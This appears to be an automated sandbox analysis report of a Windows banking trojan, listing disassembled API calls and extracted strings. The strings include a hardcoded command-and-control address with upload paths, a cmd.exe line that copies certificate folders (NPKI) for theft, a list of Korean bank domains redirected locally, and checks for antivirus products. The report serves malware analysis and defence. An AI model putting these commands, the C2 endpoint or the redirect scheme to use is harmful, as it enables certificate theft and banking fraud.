                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: acb55e1696818d62f7613b3393379dbb035e1e1f34fcddce67767c826e64d927
                                                • Instruction ID: 43040d4cf96770573546f0ef5553b46f0ed2c3b2f342c278d2bebaaa6e181bda
                                                • Opcode Fuzzy Hash: acb55e1696818d62f7613b3393379dbb035e1e1f34fcddce67767c826e64d927
                                                • Instruction Fuzzy Hash: 6221357178031477EB14AB558CD6F7E365AABD8B10F34422ABF056F2C6CAF4E8018B55

                                                Control-flow Graph

                                                APIs
                                                • GetSystemMenu.USER32(?,00000000,?,?,?,?,004047E8,000000FF), ref: 00401C85
                                                • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00401CD2
                                                • AppendMenuA.USER32(?,00000000,00000010,?), ref: 00401CE1
                                                • SendMessageA.USER32(?,00000080,00000001,?), ref: 00401D0D
                                                • SendMessageA.USER32(?,00000080,00000000,?), ref: 00401D21
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: Menu$AppendMessageSend$System
                                                • String ID: http://www.1.com
                                                • API String ID: 62300227-1471656216
                                                • Opcode ID: 8bfcf3e66f0112f36f00dce6af1070b3536336381e515d163b94ad252a9c805a
                                                • Instruction ID: 014e3ba470a9a3624742ceba51641722d59a2d0febe7554dbc01a11c7d6f2640
                                                • Opcode Fuzzy Hash: 8bfcf3e66f0112f36f00dce6af1070b3536336381e515d163b94ad252a9c805a
                                                • Instruction Fuzzy Hash: 142192B53447017BE220EB65CC86F5BB3A8FB88B50F10462DB6556B2D1CBB9F800CB59

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: _mbscmp
                                                • String ID: user.ini
                                                • API String ID: 2888065108-1338118170
                                                • Opcode ID: f68a4b7512e58f0b074adbafbc15d7738ed7276c7fa3a7cd18c7a8ce536ae287
                                                • Instruction ID: 7586933d42d8af5822a5c6cc992a2378d2c9300e52b0bfec7b5886e4e50d1dbd
                                                • Opcode Fuzzy Hash: f68a4b7512e58f0b074adbafbc15d7738ed7276c7fa3a7cd18c7a8ce536ae287
                                                • Instruction Fuzzy Hash: F341D1B16483406BC314FF55CC42BAF7654AFD0709F40067EFA06762C1DB7C69088AAB

                                                Control-flow Graph

                                                control_flow_graph 399 402f00-402f11 VariantClear 400 402f13-402f18 399->400 401 402f1b-402f25 399->401 400->401 402 402f27-402f29 401->402 403 402f2b-402f5b lstrlen call 4043b0 MultiByteToWideChar 401->403 404 402f5e-402f6a SysAllocString 402->404 403->404 407 402f7c-402f85 404->407 408 402f6c-402f6e 404->408 408->407 409 402f70-402f75 408->409 409->407
                                                APIs
                                                • VariantClear.OLEAUT32(?), ref: 00402F09
                                                • lstrlen.KERNEL32(00402DDC,?,00402DDC,00407194), ref: 00402F2C
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00402DDC,000000FF,?,00000001,?,00402DDC,00407194), ref: 00402F55
                                                • SysAllocString.OLEAUT32(00000000), ref: 00402F5F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: AllocByteCharClearMultiStringVariantWidelstrlen
                                                • String ID: NULL
                                                • API String ID: 3257503732-324932091
                                                • Opcode ID: 2c32c68fdb7f477cd471d25b524953c9b06913d1421e61b9c9fbc39c3ea53eac
                                                • Instruction ID: d48dc8f015bb9ad4e3fe3b606f75ade0cd382acbba87cbd38ab65ded183ca584
                                                • Opcode Fuzzy Hash: 2c32c68fdb7f477cd471d25b524953c9b06913d1421e61b9c9fbc39c3ea53eac
                                                • Instruction Fuzzy Hash: 9801D272600616ABC7105F52CD84B5BBBB8EF413A4F108136FE04B7390E3B898018BE9
                                                APIs
                                                Strings
                                                • ekimhuqcroanflvzgdjtxypswb, xrefs: 004010CB
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: rand$CountTicksrand
                                                • String ID: ekimhuqcroanflvzgdjtxypswb
                                                • API String ID: 3923125369-3762667353
                                                • Opcode ID: af64965fe20426d731e7306a6c52b6f3676ca0dad364db7fcac0bb6fbcf8137a
                                                • Instruction ID: b437bbb5ddae58e17e7d4b32f079fbf535bad8d5f4727950ce3f72a2bcf890de
                                                • Opcode Fuzzy Hash: af64965fe20426d731e7306a6c52b6f3676ca0dad364db7fcac0bb6fbcf8137a
                                                • Instruction Fuzzy Hash: 34F04436B052004BC204AA2D9D40A6FF797EBC8351F85043EFE89E3352C976980846BA
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: fclosefopenfprintf
                                                • String ID: user.ini
                                                • API String ID: 167258513-1338118170
                                                • Opcode ID: a6a6fb629337a14a19167b81d9b5a2f6b5228c5787a28112ea1f94429918bd96
                                                • Instruction ID: 013291e13a0706baa31a3bd6034cca8677a8dde525ade2333a9cb0047f89d752
                                                • Opcode Fuzzy Hash: a6a6fb629337a14a19167b81d9b5a2f6b5228c5787a28112ea1f94429918bd96
                                                • Instruction Fuzzy Hash: 2C51D7716483809BD310EB15C845F9BBBE4AFD5718F04096EFA85732C1DB7DA504CA6B
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: ClearFreeStringVariant
                                                • String ID:
                                                • API String ID: 1438600931-0
                                                • Opcode ID: 36ddf7c9e64948429ea50c594583730548552646f732539940beb09dbb1102c1
                                                • Instruction ID: 37251e203aaafb338411583485349c6a70529d6897f4196c911f470311200aa0
                                                • Opcode Fuzzy Hash: 36ddf7c9e64948429ea50c594583730548552646f732539940beb09dbb1102c1
                                                • Instruction Fuzzy Hash: 8D6110B46083818FC300DFA8C884A1AFBE8BF89704F508D6EF89597350C779E949CB56
                                                APIs
                                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00403762
                                                • SendMessageA.USER32(?,00000143,00000000,?), ref: 00403896
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: user.ini
                                                • API String ID: 3850602802-1338118170
                                                • Opcode ID: e2a0c54cd5d71bfe7c8f7115dbcc982c8ab97f2cc07cf54eacd2f770ea5d7972
                                                • Instruction ID: 54062048f7d8e9c3c5b10c10d2f13be0a112b8bce1456f32d0f06b7dcf1a2bd7
                                                • Opcode Fuzzy Hash: e2a0c54cd5d71bfe7c8f7115dbcc982c8ab97f2cc07cf54eacd2f770ea5d7972
                                                • Instruction Fuzzy Hash: 8151C6F1508341AFC314EB22C856F5F7BE8ABD5B48F004A2DF655662C1DB789608CBA7
                                                APIs
                                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00402202
                                                • SendMessageA.USER32(?,00000143,00000000,?), ref: 00402336
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: user.ini
                                                • API String ID: 3850602802-1338118170
                                                • Opcode ID: 37e4858ff997d67b506cbc70ba22a13177efcd1f51f67c78ac5313dcec2c17d1
                                                • Instruction ID: afaa56c09f8307c61a21e81d60edd19e1058136c3d77b862272b9fbdbc9fbc74
                                                • Opcode Fuzzy Hash: 37e4858ff997d67b506cbc70ba22a13177efcd1f51f67c78ac5313dcec2c17d1
                                                • Instruction Fuzzy Hash: 9E51E9B1508341AFC304EB62C856F5F7BE8ABD5748F400A2DFA55662C1DB789608CBA7

                                                Execution Graph

                                                Execution Coverage:11%
                                                Dynamic/Decrypted Code Coverage:1.3%
                                                Signature Coverage:19.2%
                                                Total number of Nodes:959
                                                Total number of Limit Nodes:27
6105->6104 6106 10005f55 InterlockedDecrement 6106->6108 6107 10011725 wcslen WideCharToMultiByte GetLastError GetLastError _CxxThrowException 6107->6108 6108->6101 6108->6102 6108->6103 6108->6104 6108->6105 6108->6106 6108->6107 6109 10006050 2 API calls 6108->6109 6109->6108 6111 1000660e 6110->6111 6112 100066e1 6CEE2C70 CloseHandle 6111->6112 6113 1000662f VirtualQueryEx 6111->6113 6114 10006684 ReadProcessMemory 6111->6114 6115 1000666d 6CEE2C70 6111->6115 6117 10006330 6111->6117 6113->6111 6113->6112 6114->6111 6115->6111 6119 1000633a 6117->6119 6118 10006583 6118->6111 6119->6118 6120 1000639a wsprintfA 6119->6120 6121 100061f0 2 API calls 6120->6121 6122 100063ec wsprintfA wsprintfA CreateDirectoryA 6121->6122 6125 10005130 CreateFileA WriteFile CloseHandle 6122->6125 6124 10006477 14 API calls 6124->6119 6125->6124 6126->5700 6128 10007873 6127->6128 6159 10004940 InternetOpenA 6128->6159 6130 1000789b 6131 100078a2 6130->6131 6160 10004960 InternetOpenUrlA 6130->6160 6131->5703 6133 100078d4 6133->5703 6135 10007969 MultiByteToWideChar 6136 100078ca 6135->6136 6136->6133 6136->6135 6137 10007988 MultiByteToWideChar WideCharToMultiByte 6136->6137 6138 100079be WideCharToMultiByte 6CEE2C70 6136->6138 6139 10007a07 6136->6139 6161 10004990 InternetReadFile 6136->6161 6137->6136 6140 100079f6 6CEE2C70 6138->6140 6141 10007a81 6139->6141 6142 10007af3 wsprintfA 6139->6142 6140->6136 6144 10007a90 6141->6144 6146 10007a97 6CEE2C70 6141->6146 6143 10007b14 6CEE2C70 strrchr 6142->6143 6148 10007bd2 6143->6148 6149 10007b56 6143->6149 6147 10007abc 6144->6147 6150 10007ad5 6CEE2C70 6144->6150 6146->6144 6147->5703 6151 10007be4 6148->6151 6153 10007beb 6CEE2C70 6148->6153 6152 10007b6b 6149->6152 6155 10007b72 6CEE2C70 6149->6155 6150->5703 6154 10007c10 6151->6154 6157 10007c28 6CEE2C70 6151->6157 6156 10007b97 6152->6156 6158 10007bb2 6CEE2C70 6152->6158 6153->6151 6154->5703 6155->6152 6156->5703 6157->6154 6158->6156 6159->6130 6160->6136 6161->6136 
6162->5731 6184 100075f0 6163->6184 6165 10008aa1 6199 10006b90 setsockopt 6165->6199 6169 10008ab8 6170 10008acc send 6169->6170 6171 10008aea closesocket 6170->6171 6182 10008aff 6170->6182 6172 10008cd4 6173 10008b09 select 6174 10008cc7 InterlockedExchange 6173->6174 6173->6182 6174->6172 6175 10008c3e InterlockedExchange 6175->6173 6176 10008bfe closesocket 6176->6173 6177 10008c81 strstr 6179 10008c98 CreateThread 6177->6179 6177->6182 6179->6173 6289 100084a0 6179->6289 6181 10007110 6 API calls 6181->6182 6182->6172 6182->6173 6182->6174 6182->6175 6182->6176 6182->6177 6182->6181 6183 100049f0 ExitWindowsEx 6182->6183 6219 100071c0 6182->6219 6229 10007250 LoadLibraryA LoadLibraryA GetProcAddress GetProcAddress 6182->6229 6183->6182 6185 10007776 WSAStartup htons 6184->6185 6186 10007688 strstr 6184->6186 6231 10006860 inet_addr inet_addr 6185->6231 6187 100076aa 6186->6187 6188 100076fd 6186->6188 6235 100073c0 6187->6235 6193 10007725 strstr 6188->6193 6192 100076b7 strstr 6192->6188 6196 100076c8 strcspn strstr 6192->6196 6193->6185 6197 10007738 strcspn strncpy strcspn atoi 6193->6197 6194 100077d5 closesocket 6194->6165 6195 100077ea 6195->6165 6196->6193 6198 100076e3 strcspn strncpy 6196->6198 6197->6185 6198->6193 6200 10006bb1 6199->6200 6201 10006f20 RegOpenKeyExA 6200->6201 6202 10006f96 6201->6202 6203 10006f59 6201->6203 6254 100068d0 6202->6254 6260 10004c70 RegQueryValueExA 6203->6260 6205 10006f8c 6261 10004c60 RegCloseKey 6205->6261 6209 10006bf0 2 API calls 6210 10006ff9 GlobalMemoryStatusEx 6209->6210 6211 10007021 6210->6211 6212 10004920 wvsprintfA 6211->6212 6213 10007037 GetSystemDefaultUILanguage 6212->6213 6262 10006e40 6213->6262 6215 100070aa 6216 100070b1 6215->6216 6217 10004920 wvsprintfA 6215->6217 6216->6169 6218 100070fb 6217->6218 6218->6169 6220 10004920 wvsprintfA 6219->6220 6221 100071db 6220->6221 6286 10004b40 CreateFileA 6221->6286 6223 100071ff 6224 10007209 6223->6224 6287 10004a60 WriteFile 6223->6287 6224->6182 
6226 10007236 6288 10004a50 CloseHandle 6226->6288 6228 1000723c 6228->6182 6230 100072ad 6229->6230 6230->6182 6232 10006876 6231->6232 6234 1000687c socket connect 6231->6234 6248 10004890 gethostbyname 6232->6248 6234->6194 6234->6195 6236 100073ca 6235->6236 6249 10004940 InternetOpenA 6236->6249 6238 100073f3 6239 10007461 6238->6239 6250 10004960 InternetOpenUrlA 6238->6250 6239->6192 6241 10007416 6247 10007447 6241->6247 6251 10004990 InternetReadFile 6241->6251 6244 10007441 6252 100049b0 InternetCloseHandle 6244->6252 6245 10007450 6245->6192 6253 100049b0 InternetCloseHandle 6247->6253 6248->6234 6249->6238 6250->6241 6251->6244 6252->6247 6253->6245 6255 10006994 6254->6255 6256 100068e7 6254->6256 6255->6209 6256->6255 6257 100068fb GlobalAlloc 6256->6257 6258 10006943 6257->6258 6259 1000698b GlobalFree 6257->6259 6258->6258 6258->6259 6259->6255 6260->6205 6261->6202 6263 10004920 wvsprintfA 6262->6263 6264 10006e71 6263->6264 6280 10004a10 PathFileExistsA 6264->6280 6266 10006e82 6266->6215 6267 10006e7b 6267->6266 6281 10004b40 CreateFileA 6267->6281 6269 10006eaf 6270 10006eb9 6269->6270 6282 10004b70 ReadFile 6269->6282 6270->6215 6272 10006ee1 6283 10004a50 CloseHandle 6272->6283 6274 10006ee7 6284 10004a20 StrStrIA 6274->6284 6276 10006ef2 6277 10006ef9 6276->6277 6285 10004a20 StrStrIA 6276->6285 6277->6215 6279 10006f0d 6279->6215 6280->6267 6281->6269 6282->6272 6283->6274 6284->6276 6285->6279 6286->6223 6287->6226 6288->6228 6290 10004f60 5 API calls 6289->6290 6291 100084b4 6290->6291 6321 10008440 6291->6321 6293 100084c1 6294 100084bc 6294->6293 6295 10007470 7 API calls 6294->6295 6297 100084f6 6295->6297 6296 10006bf0 2 API calls 6298 10008559 GetTickCount srand 6296->6298 6297->6296 6320 10008a56 6297->6320 6300 100085ea rand 6298->6300 6301 100085f3 6300->6301 6301->6300 6302 10008606 wsprintfA CreateDirectoryA rand 6301->6302 6303 10008664 rand 6302->6303 6304 1000865f 6302->6304 6305 10008673 6303->6305 6306 10008678 rand 
6303->6306 6304->6303 6305->6306 6307 10008687 6306->6307 6308 1000868c rand 6306->6308 6307->6308 6309 100086a0 rand 6308->6309 6310 1000869b 6308->6310 6311 100086b4 wsprintfA wsprintfA 6309->6311 6312 100086af 6309->6312 6310->6309 6313 100086f5 6311->6313 6312->6311 6328 10007d30 CreateFileA WriteFile CloseHandle 6313->6328 6315 10008708 Sleep 6317 10008440 20 API calls 6315->6317 6318 10008728 6317->6318 6319 10008730 50 API calls 6318->6319 6318->6320 6319->6320 6322 10004f60 5 API calls 6321->6322 6323 1000844e CreateMutexA GetLastError 6322->6323 6324 10008470 6323->6324 6325 1000848c ReleaseMutex CloseHandle 6324->6325 6326 10004da0 11 API calls 6324->6326 6325->6294 6327 10008484 6326->6327 6327->6325 6328->6315 6329->5736 6341 10004b10 GetShortPathNameA 6330->6341 6332 10009039 6333 10001000 2 API calls 6332->6333 6334 10009060 6333->6334 6342 10004c20 RegCreateKeyExA 6334->6342 6336 1000906e wsprintfA 6343 10004cc0 RegSetValueExA 6336->6343 6338 100090c2 6344 10004c60 RegCloseKey 6338->6344 6340 100090cf 6341->6332 6342->6336 6343->6338 6344->6340 7527 10011330 7528 1001130a 7527->7528 7528->7527 7529 10011a56 9 API calls 7528->7529 7529->7528 7603 10001770 7604 10001780 7603->7604 7605 10001000 2 API calls 7604->7605 7606 1000178a GetProcAddress 7605->7606 7639 10007f84 7640 10007f8e _CxxThrowException 7639->7640 7641 10007fb9 7640->7641 7642 10007fbd _CxxThrowException 7641->7642 7643 10007fd8 7641->7643 7644 1000802e RegCloseKey 7643->7644 7645 10007fee lstrlen 7643->7645 7645->7644 6345 10021789 6347 10021790 6345->6347 6348 100217b6 VirtualAlloc 6347->6348 6349 100217a5 6347->6349 6350 10021a01 6348->6350 6351 100217fb 6348->6351 6349->6348 6349->6350 6351->6350 6353 10021806 6351->6353 6354 10021815 6353->6354 6355 10021872 VirtualFree 6354->6355 6358 1002189a 6355->6358 6356 10021a01 6356->6350 6357 100219e2 VirtualProtect 6357->6356 6357->6357 6358->6356 6358->6357 7676 1000fba0 7677 1000fbab 7676->7677 7678 1000fbad 7676->7678 7681 1000fbf0 
7678->7681 7680 1000fbbc 7682 1000fc21 7681->7682 7683 1000fc05 7681->7683 7684 1000fc7c 7682->7684 7685 1000fcc4 WriteFile 7682->7685 7683->7682 7686 1000fc11 6CEE2C70 7683->7686 7684->7680 7685->7680 7686->7682 7714 1000a7b0 7716 1000a7b7 7714->7716 7715 1000a7c1 7716->7715 7717 100117f5 _CxxThrowException 7716->7717 7717->7715 7811 10007ffb 7812 1000800d 7811->7812 7813 1000802e RegCloseKey 7812->7813

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: lstrcatrand$FileFindlstrcpy$CountFirstNextTick_strcmpisrand
                                                • String ID: %s\%s$*.*$.$/u.php$09121307.txt$107.163.241.232:12354/show.php$NPKI$P$c:\%c%c%c%c.%c%c%c$c:\%s$cmd.exe /c md c:\%s && xcopy /Y "%s" "c:\%s" /S /E /C /H && exit$cmd.exe /c rd /q /s "c:\%s"
                                                • API String ID: 3781771675-2805527149
                                                • Opcode ID: bbee613478e399059a034d314f1c1b5c2bab36900512fa1b90fe0e01db607cb7
                                                • Instruction ID: eb23a03111fe4c4eb7601a1bdb2af3d3cdc9092a3aaab1ed9f55861fbd2d4e08
                                                • Opcode Fuzzy Hash: bbee613478e399059a034d314f1c1b5c2bab36900512fa1b90fe0e01db607cb7
                                                • Instruction Fuzzy Hash: 5FD1A6B1508386AFE725CB64CD91BEB77DAEBC8344F004D2DE68A97241DB74D6088B53

                                                Control-flow Graph

                                                control_flow_graph 111 100055e0-100056d1 WSAStartup socket * 2 htons inet_addr htons inet_addr bind ioctlsocket 112 100056d7-10005714 select 111->112 113 10005716-10005727 Sleep 112->113 114 10005729-10005766 112->114 113->112 114->112 117 1000576c-1000576e 114->117 118 10005774-100057ee call 10005530 wsprintfA 117->118 119 10005947-10005956 call 10004da0 117->119 127 100057f0-100057fe 118->127 128 10005828-10005869 malloc htons 118->128 124 10005959-1000597e closesocket * 2 119->124 133 10005820 127->133 134 10005800-1000580e 127->134 129 1000587a-100058de htons * 5 128->129 130 1000586b-10005871 128->130 136 100058e0-100058e5 129->136 137 100058e7 129->137 130->129 132 10005873-10005878 htons 130->132 132->129 133->128 134->133 140 10005810-1000581e 134->140 138 100058ec-10005934 inet_addr 136->138 137->138 142 100056d3 138->142 143 1000593a-10005940 138->143 140->128 140->133 142->112 143->124 145 10005942 143->145 145->112
                                                APIs
                                                Strings
                                                • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke, xrefs: 100057D9
                                                • %s|, xrefs: 100057BB
                                                • v3lite, xrefs: 10005814
                                                • c:\3.txt, xrefs: 1000594C
                                                • 127.0.0.1, xrefs: 1000568F, 100058E7
                                                • 8.8.8.8, xrefs: 1000562D
                                                • ahnlab, xrefs: 10005804
                                                • alyac, xrefs: 100057F4
                                                • iRecv=0, xrefs: 10005947
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID: htons$inet_addr$closesocketsocket$SleepStartupbindioctlsocketmallocselectwsprintf
                                                • String ID: %s|$127.0.0.1$8.8.8.8$ahnlab$alyac$c:\3.txt$iRecv=0$v3lite$www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke
                                                • API String ID: 1328051524-4015207955
                                                • Opcode ID: 4828b0be3a3e2642fd62dd5c7122c309b17e755da9cbc61a39448c2e2ba24f89
                                                • Instruction ID: 8807dec323691aef2f5420f23a93805b2fe18ff7326935eede266de03f692902
                                                • Opcode Fuzzy Hash: 4828b0be3a3e2642fd62dd5c7122c309b17e755da9cbc61a39448c2e2ba24f89
                                                • Instruction Fuzzy Hash: 52A1AF31608344ABE710DB64CC45BAFBBE5EF88744F00491DF68597290DBB5E988CB57

                                                Control-flow Graph

                                                APIs
                                                • LoadLibraryA.KERNEL32 ref: 100051CA
                                                • GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 100051DA
                                                • GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000), ref: 100051F1
                                                • malloc.MSVCRT ref: 1000520A
                                                • GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000,?,?,1000BBB2,00000035), ref: 10005230
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID: ExtendedTable$AddressLibraryLoadProcmalloc
                                                • String ID: GetExtendedUdpTable$iphlpapi.dll
                                                • API String ID: 2385667234-1809394930
                                                • Opcode ID: 02ae61e850a1fbcb1a22724745b000119a1a924dfa203604408c47b977caae4e
                                                • Instruction ID: 95fc7806c394d6749ad61a5c4c73f14e2c7cad3558be80feca9663e5c097cf93
                                                • Opcode Fuzzy Hash: 02ae61e850a1fbcb1a22724745b000119a1a924dfa203604408c47b977caae4e
                                                • Instruction Fuzzy Hash: 3A21B171204302ABE710DB68EC85BAB37E4EF857A1F014625F995C62C4D736D989CBA2

                                                Control-flow Graph

                                                APIs
                                                • sprintf.MSVCRT ref: 1000C249
                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1000C266
                                                • DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 1000C298
                                                • GetLastError.KERNEL32(00000400,?,00000000,00000000), ref: 1000C2AC
                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 1000C2BA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID: ControlCreateDeviceErrorFileFormatLastMessagesprintf
                                                • String ID: \\.\PHYSICALDRIVE%d
                                                • API String ID: 1111953355-613073274
                                                • Opcode ID: 5b8cab77ea9baa15ef1ace31b166184b4a38632cffe6251980286e991f52f3d4
                                                • Instruction ID: 2bed02b5d34ca8770e45348e80b358c4abd8b06a0c17b21f9c9ba0ca96d4da27
                                                • Opcode Fuzzy Hash: 5b8cab77ea9baa15ef1ace31b166184b4a38632cffe6251980286e991f52f3d4
                                                • Instruction Fuzzy Hash: 9A4128762503046BF324DA38DC46FEB7395EBD8760F508729FA15CB1C0EEB59A088395
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000028,00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F6A
                                                • OpenProcessToken.ADVAPI32(00000000,?,1000BB89,SeDebugPrivilege,00000001), ref: 10004F71
                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10004F87
                                                • AdjustTokenPrivileges.KERNELBASE ref: 10004FCA
                                                • CloseHandle.KERNEL32 ref: 10004FD5
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                Similarity
                                                • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                • String ID:
                                                • API String ID: 3038321057-0
                                                • Opcode ID: 0a72c3fa9fd0ee3bb1be3fa8c5ebfe263c00cb6316c39cb91c3d4bdc8cf6a7c0
                                                • Instruction ID: 7f0ff367e45407a8e9ac9eb591174fee72e0e2360a841818fda95b81e512ac6d
                                                • Opcode Fuzzy Hash: 0a72c3fa9fd0ee3bb1be3fa8c5ebfe263c00cb6316c39cb91c3d4bdc8cf6a7c0
                                                • Instruction Fuzzy Hash: 6401D7B8608301ABE704DF64C885B6A77E8FBC8B45F40891DF54986290DB74D945CB62
                                                APIs
                                                • VirtualFree.KERNELBASE(00100000,00000000,00008000,10021806,00000000), ref: 1002187F
